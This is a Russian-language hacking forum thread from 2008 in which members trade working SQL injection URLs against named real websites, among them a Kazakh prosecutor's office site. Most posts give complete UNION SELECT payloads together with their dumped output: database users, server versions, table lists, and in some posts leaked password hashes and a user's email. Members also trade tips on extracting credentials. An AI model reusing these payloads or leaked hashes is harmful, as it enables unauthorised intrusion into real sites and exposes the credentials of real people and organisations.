HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.03.2008, 07:22
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
С нами: 9765139

Репутация: 177
По умолчанию

http://www.sbornaya.kz/articles/text/?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t_ws(0x3a,version(),database(),user()),1),1),5,6,7 ,8,9,10,11,12,13,14+/*
 
Ответить с цитированием

  #2  
Старый 05.03.2008, 09:36
SIdoy
Новичок
Регистрация: 19.09.2007
Сообщений: 12
С нами: 9812750

Репутация: 19
По умолчанию

www.biomusic.ru

Цитата:
http://www.biomusic.ru/album.php?id=15819%20and%201=0%20union%20select%20 1,2,3,4,5,6,7,concat_ws(0x3a,user_pass,email),9,10 ,11,12,13%20from%20users%20limit%202,1--
админка:
http://www.biomusic.ru/admin.php



mp3.volpi.ru

Цитата:
http://mp3.volpi.ru/view.php?id=3893%20and%201=0%20union%20select%201, concat(user,char(58),password),3,concat(user,char( 58),password),5,4,7,8,9,10,11,12,13%20from%20mysql .user--

Последний раз редактировалось SIdoy; 05.03.2008 в 09:41..
 
Ответить с цитированием

  #3  
Старый 05.03.2008, 11:25
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

http://www.regioninfo.ru/pfolioss.php?key_site=-1+union+select+1,concat(version(),user(),database( )),3,4,5,6,7,8,9,10,11+/*

4.0.24-standard-log
salutaru_regi@localhost
salutaru_regi
 
Ответить с цитированием

  #4  
Старый 05.03.2008, 13:20
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами: 9587456

Репутация: 120
По умолчанию

SIdoy
1-www.biomusic.ru Баян
2-mp3.volpi.ru Баян
 
Ответить с цитированием

  #5  
Старый 05.03.2008, 14:57
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

http://www.procuror.kz/?iid=-1+union+select+1,concat(user(),char(58),version(), char(58),database()),3,4,5,6,7,8+/*

Сам не ломал и вам не советую, ПРОКУРАТУРА БЛИН! ))))
 
Ответить с цитированием

  #6  
Старый 05.03.2008, 15:21
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами: 9587456

Репутация: 120
По умолчанию

http://www.nmmra.org/e-newsletters.php?id=-9+union+select+1,database(),version(),4,5,6,7,8,9, 10,11,user()/*
nmmra@localhost
nmmra
4.1.20
 
Ответить с цитированием

  #7  
Старый 05.03.2008, 19:45
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Украинская авто газета

autoua.biz

_http://www.autoua.biz/org.php?id=-219+union+select+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENC RYPT(concat(user(),char(58),version(),char(58),dat abase(),0x71),0x71),9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 ,53,54,55,56,57,58/*

autoua@localhost:4.1.18:autoua-market

_http://www.autoua.biz/org.php?id=-219+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_enc rypt(user,0x71),0x71),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58+from+mysql.user+limit+2,10/*

root:*7DD915644D68E76435D36103BF2BB41D50B337A6

блин 55 столбцов беда,кстати user и password вместе не выводит,что это может быть?
 
Ответить с цитированием

  #8  
Старый 05.03.2008, 20:09
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
С нами: 9581048

Репутация: 46
По умолчанию

steambans.com

Цитата:
http://steambans.com/launchserver.php?id=104739%20and%201=2%20UNION%20A LL%20SELECT%20concat(username,0x3a,password),2,3,4 ,5+from+site_users+where+user_id=2--
D_DK_DK@steambans.com:72e8f146d1499be218eb6f80f5 30bacd


Последний раз редактировалось Saime; 05.03.2008 в 20:50..
 
Ответить с цитированием

  #9  
Старый 05.03.2008, 21:00
Lamersha
Новичок
Регистрация: 11.12.2007
Сообщений: 6
С нами: 9692619

Репутация: 14
По умолчанию

4.1.22
telgaz_db
telgaz_mysql@212.193.227.34
http://9955599.ru/mo_job.php?mo=sect&Id=-19+UNION+SELECT+1,2/*
 
Ответить с цитированием

  #10  
Старый 05.03.2008, 22:33
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
С нами: 10091878

Репутация: 369
По умолчанию

http://www.naturamunda.lt
Код:
http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,version(),8,9/*
tarpininka_nm@localhost
5.0.45-community-log


Идем дальше:
Код:
http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,TABLE_NAME,8,9+from+

INFORMATION_SCHEMA.TABLES/*
30 таблиц, среди них:
users_db
personalas
user_privileges
и др.


http://sperling-coll.dk
Код:
http://sperling-coll.dk/?filenavn=varer.php4&traeid=-1+union+select+concat_ws(char(58),user(),version(),database())/*
И читаем титул:
Sperling - root@localhost:5.0.27:dbsperlingNY
Думаю, проблем быть не должно =)

А это Вам на съедение:
Код:
http://www.hajosalfred.hu/eng/news.php?id=-1+union+select+1,2,3,4,5+--+
=)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.